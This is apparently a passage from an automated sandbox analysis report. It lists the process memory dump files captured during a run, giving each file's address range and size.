            • memory/1288-210-0x00000182D7A80000-0x00000182D7BCE000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/1716-212-0x000001D8DFC70000-0x000001D8DFDBE000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/2304-211-0x000001F07CF60000-0x000001F07D0AE000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/2404-269-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2404-267-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2404-266-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2404-265-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2404-263-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2404-264-0x0000000140000000-0x000000014000E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2528-106-0x0000000000550000-0x0000000000754000-memory.dmp

              Filesize

              2.0MB

              Download

            • memory/2528-199-0x000000001BBA0000-0x000000001BC6D000-memory.dmp

              Filesize

              820KB

              Download

            • memory/2528-119-0x00000000028A0000-0x00000000028AC000-memory.dmp

              Filesize

              48KB

              Download

            • memory/2528-117-0x0000000002890000-0x000000000289E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2528-115-0x0000000002870000-0x000000000287E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2528-113-0x000000001B2B0000-0x000000001B2C8000-memory.dmp

              Filesize

              96KB

              Download

            • memory/2528-121-0x000000001B2D0000-0x000000001B2DE000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2528-111-0x000000001B610000-0x000000001B660000-memory.dmp

              Filesize

              320KB

              Download

            • memory/2528-110-0x000000001B290000-0x000000001B2AC000-memory.dmp

              Filesize

              112KB

              Download

            • memory/2528-108-0x0000000002860000-0x000000000286E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2528-123-0x000000001B2E0000-0x000000001B2EC000-memory.dmp

              Filesize

              48KB

              Download

            • memory/3780-255-0x0000020174D00000-0x0000020174D1A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/3780-248-0x00000201741E0000-0x00000201741FC000-memory.dmp

              Filesize

              112KB

              Download

            • memory/3780-249-0x0000020174AE0000-0x0000020174B95000-memory.dmp

              Filesize

              724KB

              Download

            • memory/3780-250-0x0000020174200000-0x000002017420A000-memory.dmp

              Filesize

              40KB

              Download

            • memory/3780-252-0x0000020174CE0000-0x0000020174CFC000-memory.dmp

              Filesize

              112KB

              Download

            • memory/3780-253-0x0000020174790000-0x00000201748DE000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/3780-254-0x0000020174210000-0x000002017421A000-memory.dmp

              Filesize

              40KB

              Download

            • memory/3780-256-0x0000020174220000-0x0000020174228000-memory.dmp

              Filesize

              32KB

              Download

            • memory/3780-258-0x0000020174230000-0x0000020174236000-memory.dmp

              Filesize

              24KB

              Download

            • memory/3780-259-0x0000020174D20000-0x0000020174D2A000-memory.dmp

              Filesize

              40KB

              Download

            • memory/3780-262-0x0000020174790000-0x00000201748DE000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/3896-195-0x000001A9DFCC0000-0x000001A9DFE0E000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/3896-134-0x000001A9C7800000-0x000001A9C7822000-memory.dmp

              Filesize

              136KB

              Download

            • memory/4372-81-0x000001B2F8350000-0x000001B2F8546000-memory.dmp

              Filesize

              2.0MB

              Download

            • memory/4372-71-0x000001B2F5CA0000-0x000001B2F5D98000-memory.dmp

              Filesize

              992KB

              Download

            • memory/4412-42-0x0000000007D40000-0x0000000007DD6000-memory.dmp

              Filesize

              600KB

              Download

            • memory/4412-40-0x0000000007A80000-0x0000000007A9A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/4412-10-0x00000000060A0000-0x0000000006106000-memory.dmp

              Filesize

              408KB

              Download

            • memory/4412-27-0x0000000071130000-0x000000007117C000-memory.dmp

              Filesize

              304KB

              Download

            • memory/4412-26-0x0000000006D30000-0x0000000006D62000-memory.dmp

              Filesize

              200KB

              Download

            • memory/4412-25-0x0000000075310000-0x0000000075AC0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4412-24-0x0000000075310000-0x0000000075AC0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4412-23-0x0000000006830000-0x000000000687C000-memory.dmp

              Filesize

              304KB

              Download

            • memory/4412-22-0x0000000006740000-0x000000000675E000-memory.dmp

              Filesize

              120KB

              Download

            • memory/4412-21-0x00000000061F0000-0x0000000006544000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/4412-11-0x0000000006180000-0x00000000061E6000-memory.dmp

              Filesize

              408KB

              Download

            • memory/4412-37-0x0000000006D10000-0x0000000006D2E000-memory.dmp

              Filesize

              120KB

              Download

            • memory/4412-41-0x0000000007AF0000-0x0000000007AFA000-memory.dmp

              Filesize

              40KB

              Download

            • memory/4412-39-0x00000000080C0000-0x000000000873A000-memory.dmp

              Filesize

              6.5MB

              Download

            • memory/4412-4-0x000000007531E000-0x000000007531F000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4412-46-0x0000000007E20000-0x0000000007E3A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/4412-78-0x0000000075310000-0x0000000075AC0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4412-43-0x0000000007C70000-0x0000000007C81000-memory.dmp

              Filesize

              68KB

              Download

            • memory/4412-38-0x0000000007990000-0x0000000007A33000-memory.dmp

              Filesize

              652KB

              Download

            • memory/4412-44-0x0000000007D30000-0x0000000007D3E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/4412-45-0x0000000007DE0000-0x0000000007DF4000-memory.dmp

              Filesize

              80KB

              Download

            • memory/4412-49-0x0000000008CF0000-0x0000000009294000-memory.dmp

              Filesize

              5.6MB

              Download

            • memory/4412-48-0x0000000007E90000-0x0000000007EB2000-memory.dmp

              Filesize

              136KB

              Download

            • memory/4412-47-0x0000000007E10000-0x0000000007E18000-memory.dmp

              Filesize

              32KB

              Download

            • memory/4412-9-0x0000000005F30000-0x0000000005F52000-memory.dmp

              Filesize

              136KB

              Download

            • memory/4412-8-0x0000000005900000-0x0000000005F28000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/4412-7-0x0000000075310000-0x0000000075AC0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4412-6-0x0000000075310000-0x0000000075AC0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4412-5-0x0000000005160000-0x0000000005196000-memory.dmp

              Filesize

              216KB

              Download

            • memory/4884-215-0x000001A91D4A0000-0x000001A91D5EE000-memory.dmp

              Filesize

              1.3MB

              Download